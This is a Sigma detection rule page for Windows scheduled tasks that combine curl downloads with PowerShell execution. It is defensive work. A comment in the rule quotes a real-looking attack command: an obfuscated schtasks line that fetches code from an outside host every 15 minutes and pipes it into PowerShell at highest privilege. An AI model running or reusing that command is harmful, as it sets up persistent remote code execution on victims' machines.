Scheduled Task Creation with Curl and PowerShell Execution Combo
Detects the creation of a scheduled task using schtasks.exe, potentially in combination with curl for downloading payloads and PowerShell for executing them. This facilitates executing malicious payloads or connecting with C&C server persistently without dropping the malware sample on the host.
Sigma rule (View on GitHub)
1title: Scheduled Task Creation with Curl and PowerShell Execution Combo
2id: 1d174d38-8fda-4081-a9b6-56d9763c0cd8
3status: experimental
4description: |
5 Detects the creation of a scheduled task using schtasks.exe, potentially in combination with curl for downloading payloads and PowerShell for executing them.
6 This facilitates executing malicious payloads or connecting with C&C server persistently without dropping the malware sample on the host.
7references:
8 - https://tria.ge/241015-l98snsyeje/behavioral2
9author: Swachchhanda Shrawan Poudel (Nextron Systems)
10date: 2025-02-05
11tags:
12 - attack.persistence
13 - attack.t1053.005
14 - attack.defense-evasion
15 - attack.t1218
16 - attack.command-and-control
17 - attack.t1105
18logsource:
19 category: process_creation
20 product: windows
21detection:
22 # Example: cmd start /min /c schtasks /create /tn PolicyConverter /sc minute /mo 15 /tr "conhost --headless cmd /v:on /c set a=https&set b=inh&set c=ostne&set d=tservice.co&set e=!a!://www.!b!!c!!d!m& curl -o - !e!/mscu/lokc.php?wl=HGNBWBGW**Admin | powershell" /rl Highest
23 selection_img:
24 Image|endswith: '\schtasks.exe'
25 CommandLine|contains|windash: ' /create '
26 selection_curl:
27 CommandLine|contains|all:
28 - 'curl '
29 - 'http'
30 - '-o'
31 selection_powershell:
32 CommandLine|contains: 'powershell'
33 condition: all of selection_*
34falsepositives:
35 - Legitimate use of schtasks for administrative purposes.
36 - Automation scripts combining curl and PowerShell in controlled environments.
37level: medium
References
Related rules
- Curl Download And Execute Combination
- Insensitive Subfolder Search Via Findstr.EXE
- Remote File Download Via Findstr.EXE
- Hidden Flag Set On File/Directory Via Chflags - MacOS
- PowerShell MSI Install via WindowsInstaller COM From Remote Location